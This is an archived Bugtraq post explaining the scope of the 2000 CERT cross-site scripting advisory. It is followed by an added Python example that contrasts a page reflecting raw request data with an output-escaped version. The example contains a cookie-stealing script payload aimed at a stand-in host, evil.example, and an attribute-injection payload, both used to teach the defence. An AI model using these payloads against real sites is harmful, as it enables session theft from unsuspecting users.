Bugtraq mailing list archives

recent 'cross site scripting' CERT advisory


From: tim () RSTCORP COM (Tim Hollebeek)
Date: Fri, 4 Feb 2000 12:58:45 -0500


Wednesday's CERT advisory CA-2000-02 "Malicious HTML Tags Embedded in Client
Web Requests" has received some attention in the mass media.  This is very
appropriate due to the importance of the reported problem.  However, many
media reports have contained a number of inaccuracies about the nature,
scope, and impact of the problem.
This post is intended to clear up a number of misconceptions about what the
problem is and what the impact is.  For the full details, including an
enumeration of a number of possible attack scenarios, the CERT advisory should
be read in its entirety.

Misconception #1: This is a single bug or problem

The CERT advisory warns of an entire class of attacks.  Every web site that
offers more than simple unchanging HTML pages is potentially at risk.  This
means every e-commerce site, every auction site, every web based mail site,
etc.  Any software that can understand and interpret URLs and HTML, and
communicates with the outside world is also potentially at risk.

Misconception #2: This problem is "new"

Security experts and hackers have been aware of the ability to exploit these
problems for a long time, but creators of web sites and web-enabled software
have for the most part not paid adequate attention to these problems.
CERT's motivation appears to be to raise awareness of these significant
dangers in the hopes that future and existing systems will be
(re-)engineered with these problems in mind.

Misconception #3: This problem has never been exploited by hackers.

Many of the problems with Microsoft's Hotmail have been due to attacks which
fall within the range of this security advisory, as does the eBayla attack
on eBay.

Misconception #4: The potential damage from these attacks is minimal.

While scripting languages have very limited ability to take actions that can
lead to security compromises in the traditional sense, they allow for a wide
range of new attacks that can be equally devastating to a host system or
company.  Most attacks involving scripts lead to the loss or alteration of
protected, valuable or sensitive information like credit card numbers,
customer information, passwords, or even the contents of entire pages on
private intranets.  If this information can be easily accessed or manipulated,
there is often no longer any need to break into or gain administrative access
to the machine.  The critical function of the server, which is its ability to
protect and process sensitive or valuable information, has already been
compromised.

Tim Hollebeek
Reliable Software Technologies
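
The following is an added example, not part of the original post or of the CERT advisory, illustrating the class of problem the post describes: a dynamic page that copies data from the client's request straight into the HTML it returns, beside the same page with output encoding applied. The URL, the host names, the parameter name `q` and the rendering functions are constructed for the example and do not come from the advisory or from any real site.

```python
"""Reflecting client-supplied request data into HTML: vulnerable and hardened.

Added example (not from the Bugtraq post or CA-2000-02). Shows how a search
page that echoes a query parameter hands an attacker a script-injection
channel, and how HTML-escaping the data at the point of output closes it in
both element-body and attribute contexts.
"""
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed attacker-crafted request (hypothetical hosts). The script in the
# 'q' parameter would ship the victim's cookies to a third-party host when the
# reflected page renders in the victim's browser.
MALICIOUS_URL = (
    "http://shop.example/search?q="
    "%3Cscript%3Edocument.location%3D%27http%3A//evil.example/%3F%27"
    "%2Bdocument.cookie%3C/script%3E"
)

# Constructed payload aimed at an attribute context: closes the value="..."
# quote and injects an event handler instead of a <script> element.
ATTRIBUTE_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'


def query_param(url, name):
    """Return the first (URL-decoded) value of query parameter `name`."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get(name, [""])[0]


def render_vulnerable(term):
    """Search page that interpolates the raw request data into the HTML body."""
    return (
        "<html><body>"
        f"<p>Results for: {term}</p>"
        f'<form><input name="q" value="{term}"></form>'
        "</body></html>"
    )


def render_hardened(term):
    """Same page, but the request data is HTML-escaped at the point of output.

    escape(..., quote=True) encodes <, >, &, " and ', which covers both the
    element-body context (<p>) and the double-quoted attribute context (value).
    """
    safe = escape(term, quote=True)
    return (
        "<html><body>"
        f"<p>Results for: {safe}</p>"
        f'<form><input name="q" value="{safe}"></form>'
        "</body></html>"
    )


def injects_markup(page, term):
    """Crude check: does the untrusted term survive in the page as live markup?

    True when an unescaped '<', '>' or '"' from the term appears verbatim in the
    output. A real review would use a parser; this is enough to show the
    difference between the two renderers above.
    """
    dangerous = [c for c in '<>"' if c in term]
    return any(c in page and escape(c, quote=True) not in page for c in dangerous)


if __name__ == "__main__":
    term = query_param(MALICIOUS_URL, "q")
    print("decoded parameter:", term)
    print("vulnerable reflects markup:", injects_markup(render_vulnerable(term), term))
    print("hardened reflects markup:  ", injects_markup(render_hardened(term), term))
    print("attribute payload, hardened:", render_hardened(ATTRIBUTE_PAYLOAD))
```

Escaping at output is the check to look for when auditing a dynamic site of the kind the post describes: the fix belongs where data meets HTML, in every context (element body, attribute, URL, script) the data is written into, rather than in an input filter that tries to enumerate bad tags.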

